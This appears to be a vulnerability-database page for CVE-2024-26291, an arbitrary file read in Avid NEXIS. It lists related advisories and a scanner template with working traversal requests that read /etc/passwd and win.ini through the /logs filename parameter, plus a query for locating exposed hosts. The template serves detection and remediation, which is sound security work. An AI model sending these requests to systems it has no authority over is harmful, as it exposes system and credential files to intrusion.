| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-26291 | 9 Sep 202520:51 | – | circl | |
| Avid多款产品 安全漏洞 | 14 Jul 202500:00 | – | cnnvd | |
| CVE-2024-26291 | 14 Jul 202508:12 | – | cve | |
| CVE-2024-26291 Authenticated Arbitrary File Read affecting Avid NEXIS | 14 Jul 202508:12 | – | cvelist | |
| EUVD-2024-23562 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-26291 | 14 Jul 202509:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check | 26 Sep 201700:00 | – | openvas | |
| PT-2025-29436 | 14 Jul 202500:00 | – | ptsecurity | |
| CVE-2024-26291 | 16 Jul 202509:00 | – | redhatcve | |
| CVE-2024-26291 Authenticated Arbitrary File Read affecting Avid NEXIS | 14 Jul 202508:12 | – | vulnrichment |
id: CVE-2024-26291
info:
name: Avid NEXIS Agent - Arbitrary File Read
author: DhiyaneshDK
severity: high
description: |
Avid NEXIS E-series, F-series, PRO+, and System Director Appliance (SDA+) before 2025.5.1 contain an unauthenticated arbitrary file read caused by improper validation of the filename parameter, letting unauthenticated attackers read sensitive files, exploit requires no authentication.
impact: |
Unauthenticated attackers can read sensitive files with highest privileges, potentially exposing critical information.
remediation: Upgrade to Avid NEXIS version 2025.5.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-26291
- https://raeph123.github.io/BlogPosts/Avid_Nexis/Advisory_Avid_Nexus_Agent_Multiple_Vulnerabilities_en.html
- https://kb.avid.com/pkb/articles/troubleshooting/en239659
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-26291
epss-score: 0.01083
epss-percentile: 0.61143
cwe-id: CWE-285
metadata:
verified: true
max-request: 2
vendor: avid
product: nexis
fofa-query: body="Avid Nexis"
tags: cve,cve2024,avid,nexis,lfi,file-read,gsoap
flow: http(1) || http(2)
http:
- raw:
- |
GET /logs?filename=%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
name: linux
dsl:
- 'status_code == 200'
- 'contains(body, "root:")'
- 'contains(header, "gSOAP")'
condition: and
- raw:
- |
GET /logs?filename=C%3A%5CWindows%5Cwin.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
name: windows
dsl:
- 'status_code == 200'
- 'contains(body, "[fonts]") || contains(body, "[extensions]")'
- 'contains(header, "gSOAP")'
condition: and
# digest: 4a0a00473045022100f338a39254d061dc705e50274eb142f0a811d1e07c44332d3385860e6a654e4e02201c4112ca71b200df06ec9fbc33ab91009e3a7df6504eb6b35b36814c17ed5d25:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation